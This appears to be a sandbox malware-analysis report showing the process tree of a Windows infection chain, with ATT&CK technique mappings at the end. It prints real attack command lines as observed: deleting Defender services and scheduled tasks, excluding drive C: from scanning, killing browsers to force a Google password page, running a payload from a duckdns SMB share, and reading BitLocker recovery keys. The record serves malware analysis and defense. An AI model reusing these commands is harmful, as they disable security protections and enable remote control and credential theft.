        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:4120
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:5928
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:232
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:1488
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:692
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:1088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:976
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:2496
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:2916
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:5436
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:5056
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:1196
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:5696
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:1332
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:320
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:5684
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:3836
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:5596
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:428
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:5516
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:1740
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:3960
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:5972
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:4800
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:5448
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:4424
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:3812
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:4680
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:400
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:3008
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:4648
- - C:\Users\Admin\AppData\Local\Temp\10450110101\f31e7a8e6f.exe
    "C:\Users\Admin\AppData\Local\Temp\10450110101\f31e7a8e6f.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10450110101\f31e7a8e6f.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2176
- - C:\Users\Admin\AppData\Local\Temp\10450120101\343621d628.exe
    "C:\Users\Admin\AppData\Local\Temp\10450120101\343621d628.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10450120101\343621d628.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4980
- - C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe
    "C:\Users\Admin\AppData\Local\Temp\10450130101\RLPhvHg.exe"
    3⤵
    - Executes dropped EXE
    PID:4928
- - C:\Users\Admin\AppData\Local\Temp\10450150101\0f48488de8.exe
    "C:\Users\Admin\AppData\Local\Temp\10450150101\0f48488de8.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4900
- - C:\Users\Admin\AppData\Local\Temp\10450160101\60c43db3a1.exe
    "C:\Users\Admin\AppData\Local\Temp\10450160101\60c43db3a1.exe"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    PID:6112
- - C:\Users\Admin\AppData\Local\Temp\10450170101\93bd456d31.exe
    "C:\Users\Admin\AppData\Local\Temp\10450170101\93bd456d31.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3800
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5632
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4716
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5592
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4696
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:1608
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5116
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {264004c5-c079-4c87-b528-259e1dfb1449} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:2324
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2480 -prefsLen 27135 -prefMapHandle 2484 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {76c27070-382d-45aa-b9ca-47b0c129b710} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:6048
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3920 -prefsLen 25164 -prefMapHandle 3924 -prefMapSize 270279 -jsInitHandle 3928 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3936 -initialChannelId {b33c5a02-453c-4a0a-a8ad-9f50441e946c} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        Checks processor information in registry
        
        PID:1768
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4092 -prefsLen 27276 -prefMapHandle 3916 -prefMapSize 270279 -ipcHandle 4176 -initialChannelId {31f65ede-e3f5-4ce1-b9ae-9a911ff46515} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:3428
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4512 -prefsLen 34775 -prefMapHandle 4516 -prefMapSize 270279 -jsInitHandle 4520 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3096 -initialChannelId {4f731065-9eea-4dd4-bf8b-d621afb99291} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        Checks processor information in registry
        
        PID:5124
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5060 -prefsLen 35012 -prefMapHandle 5064 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {854c9653-1730-4384-8d9b-5879344b451c} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        Checks processor information in registry
        
        PID:4452
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5560 -prefsLen 32952 -prefMapHandle 5564 -prefMapSize 270279 -jsInitHandle 5568 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5580 -initialChannelId {9d1060d4-b7c2-4f9a-a9e7-9d934dd47196} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        Checks processor information in registry
        
        PID:6112
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5728 -prefsLen 32952 -prefMapHandle 5732 -prefMapSize 270279 -jsInitHandle 5736 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5740 -initialChannelId {df1bd298-d891-4c99-afeb-6505967e4cf6} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        Checks processor information in registry
        
        PID:452
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5920 -prefsLen 32952 -prefMapHandle 5924 -prefMapSize 270279 -jsInitHandle 5928 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5744 -initialChannelId {b88bee3e-8470-4266-b339-adf5231994f5} -parentPid 5116 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5116" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        Checks processor information in registry
        
        PID:3724
- - C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe
    "C:\Users\Admin\AppData\Local\Temp\10450190101\7q8Wm5h.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- - C:\Users\Admin\AppData\Local\Temp\10450200101\192b7f067e.exe
    "C:\Users\Admin\AppData\Local\Temp\10450200101\192b7f067e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4640
- - C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10450210101\7IIl2eE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:6636
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:6744
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7156
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7152
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4476
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4600
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3800
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4192
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4696
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6120
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5200
    - - C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3996
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10450221121\pfJNmVW.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6484
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6912
      - C:\Windows\SysWOW64\net.exe
        
        net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7024
      - \??\UNC\aaso12.duckdns.org\shear\s.exe
        
        \\aaso12.duckdns.org\shear\s -fullinstall
        6⤵
        Sets service image path in registry
        Drops file in Program Files directory
        
        PID:4860
- - C:\Users\Admin\AppData\Local\Temp\10450230101\ad20dbfd5e.exe
    "C:\Users\Admin\AppData\Local\Temp\10450230101\ad20dbfd5e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4764
- - C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe
    "C:\Users\Admin\AppData\Local\Temp\10450240101\UZPt0hR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:6420
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      PID:6636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1468
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      PID:2040
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:13196
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:5532
- - C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10450250101\TbV75ZR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1376
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5472
- - C:\Users\Admin\AppData\Local\Temp\10450260101\RLPhvHg.exe
    "C:\Users\Admin\AppData\Local\Temp\10450260101\RLPhvHg.exe"
    3⤵
    - Executes dropped EXE
    PID:116
- - C:\Users\Admin\AppData\Local\Temp\10450270101\9sWdA2p.exe
    "C:\Users\Admin\AppData\Local\Temp\10450270101\9sWdA2p.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4492

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6004
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:692
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:1364
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:5056
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:4060

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBtAFAAcABSAEUAZgBlAHIARQBuAGMARQAgAC0AZQBYAEMAbABVAFMASQBvAE4AcABhAFQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwB1AHIAcgBlAG4AdABcAEYAcgBhAG0AZQB3AG8AcgBrAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAGYATwBSAEMARQA7ACAAYQBkAGQALQBtAHAAcAByAEUARgBlAFIARQBuAGMAZQAgAC0AZQB4AGMAbABVAHMASQBvAE4AcABSAE8AQwBlAFMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEMAdQByAHIAZQBuAHQAXABGAHIAYQBtAGUAdwBvAHIAawBOAGEAbQBlAC4AZQB4AGUAIAAtAEYAbwByAGMARQA=
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6152

C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
C:\Users\Admin\AppData\Roaming\Current\FrameworkName.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5624
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5072

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:6720

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:7164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:7824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:8988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:9464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:9856
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get C: -Type recoverypassword
  2⤵
  PID:12968
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get C: -Type recoverypassword
    3⤵
    PID:13064
- C:\Windows\system32\cmd.exe
  /c manage-bde -protectors -get F: -Type recoverypassword
  2⤵
  PID:5656
- - C:\Windows\system32\manage-bde.exe
    manage-bde -protectors -get F: -Type recoverypassword
    3⤵
    PID:7008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

